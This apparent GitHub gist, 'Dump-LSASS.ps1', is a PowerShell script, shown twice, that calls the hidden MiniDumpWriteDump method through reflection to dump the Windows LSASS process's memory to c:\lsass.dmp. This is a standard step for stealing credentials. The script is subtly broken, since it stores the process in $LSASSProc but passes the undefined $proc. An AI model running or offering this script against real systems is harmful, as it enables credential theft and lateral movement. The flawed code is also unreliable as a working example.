natesubra/Dump-LSASS.ps1

## Dump-LSASS.ps1
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
	$LSASSProc = Get-Process lsass
	$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
	$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
	$FileStream.Close()